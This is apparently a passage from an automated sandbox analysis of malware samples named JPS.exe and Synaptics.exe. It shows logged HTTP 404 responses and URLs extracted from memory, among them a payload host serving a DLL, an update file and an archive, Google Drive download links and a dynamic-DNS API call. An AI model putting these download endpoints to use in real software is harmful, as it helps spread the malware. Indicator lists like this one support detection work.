                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55eM4_g_1BO9gnK_9XU3zuySkRUKuSNUhhZhV_tutUfozkP09_FIIy7gjFE59tdkaYqzJtzgoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:55 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MZOnETiskmyBT6f1Wr70Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75oPaWL1DdcjJ-ZT5dDt4k1bcot08ZfNFuevV8zXGWMkYXVyyiieBezUr5X-RgzccQbKiNVMMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:56 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-YMWO-FU4SCPd4G8pJW0Z-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC71c6y3GplwwShU1LhGdG_g7pm0GTJX7SBJwfDnQEz3EpUXoyGkdZx9Msf9FbTlOjszN0YR-SUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:57 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MpU-8d2JO0ezOY9_28hAfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zJLvFfmPw8MMxFtGiXpnJmlJ90Xc5gJBEOZ-KjeLqG9LdZPdwBbl2rJAQ_Egwlb04raVwmFQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:10 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-DFds0uMIRCKYInMkLif9tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6R_z-zuhsl83xTgJEgO4UYwnSo2R8SnM8paV4nd1Z8FMtD1St3KIeUwX9jApjU_89RD58HdToContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:10 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0Gtfe_Y9ZfC2kdQeCvooqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000003.1404566857.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/
                              Source: RCX5246.tmp.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:I
                              Source: ._cache_JPS.exe, 00000002.00000002.2559043843.0000000000DE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                              Source: RCX5246.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: RCX5246.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: RCX5246.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/(
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/-cn.net
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/80(
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/B#F-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/U
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/_
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a-cn.net
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ancisco1
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/form
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ication/binary
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ity
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/le
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/licych-ua-arch=
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/oud.google.com
                              Source: Synaptics.exe, 00000003.00000003.1404479772.00000000052E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/p
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/p/cspreport
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/pt-src
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/q8
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/re
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ri
                              Source: Synaptics.exe, 00000003.00000002.1813960235.00000000078BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1850918353.0000000016BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1812144797.000000000686E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1825438577.000000000C0BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1857423043.00000000194FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: RCX5246.tmp.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1805449954.00000000020F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822891646.000000000B1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1830949340.000000000EEFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1849236992.0000000015B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1854832505.00000000184BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839585311.0000000010FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1837599377.000000000F7FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1840683340.0000000011BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1839154577.0000000010ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1850178570.000000001657E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1810857547.00000000059AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1822466449.000000000AB7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1827657847.000000000CFBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1855158439.000000001887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1845555575.00000000149FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1829132840.000000000DFFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1826252695.000000000C5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1852458217.000000001747E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1806781758.00000000045AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1841983891.0000000012ABE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.1850285165.00000000166BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#M
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#V
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#sA
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$b
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%j
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&Y
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&k
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&nf-u
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(lm-
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(o
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-B
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-Sec/on
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-X
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cach
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-j
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-m
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-stor
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c2
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.e;
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.nf
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/2
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/SQ
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/_
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/n
